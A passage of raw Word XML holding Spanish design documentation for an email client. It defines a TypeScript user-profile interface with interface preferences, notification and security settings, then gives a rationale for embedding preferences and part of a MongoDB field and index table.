          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Idioma de la interfaz (ISO 639-1) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    language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default: 'es'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Zona horaria para fechas (IANA tz database) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    timezone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default: 'America/Mexico_City'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Formato de hora: 12h o 24h */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    timeFormat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'12h'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'24h'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// default: '24h'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Tema visual */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    theme</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'system'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// default: 'system'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Densidad de la lista de emails */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    density</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'compact'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'comfortable'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'spacious'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// default: 'comfortable'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Número de emails por página */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    pageSize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default: 50, min: 10, max: 200</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Layout preferido: three-pane o list-only */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    layout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'three-pane'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'list-only'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// default: 'three-pane'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si agrupar emails por conversación (threading) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    enableThreading</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default: true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si mostrar preview del email en la lista */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    showPreview</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default: true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Atajo de teclado preferido: gmail o outlook */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    keyboardShortcutSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'gmail'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'outlook'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// default: 'gmail'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si el compositor usa formato HTML o texto plano */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    composeFormat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'html'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// default: 'html'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Firma por defecto para emails salientes (puede contener HTML) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    defaultSignature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Si incluir firma por defecto */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    autoIncludeSignature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default: true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Configuración de notificaciones */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    notifications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Habilitar notificaciones push del navegador */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      desktopEnabled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default: true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Sonido al recibir nuevo email */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      soundEnabled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default: false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Notificar solo para emails de contactos conocidos */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      notifyOnlyContacts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default: false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Configuración de seguridad */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si requiere confirmación antes de abrir links externos */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      confirmExternalLinks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default: true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si mostrar imágenes automáticamente (false = pedir confirmación) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      autoLoadImages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default: false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si bloquear contenido de remitentes no en contactos */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      blockRemoteContentUnknown</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default: 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Fecha de creación del usuario en el sistema */</w:t>
      </w:r>
      <w:r>
        <w:br/>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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha de última modificación del perfil */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  updatedAt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha del último acceso exitoso */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  lastLoginAt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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">preferences</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se almacena como documento embebido porque todas las preferencias se cargan simultáneamente al iniciar sesión y rara vez cambian individualmente. No justifica una colección separada ni joins en runtime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[141]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1630"/>
        <w:gridCol w:w="1397"/>
        <w:gridCol w:w="1863"/>
        <w:gridCol w:w="3028"/>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Índice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ObjectId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Primary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Identificador único del usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">primaryEmail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Email principal para identificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">displayName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nombre visible en la interfaz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">preferences.language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Idioma de la UI (ISO 639-1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
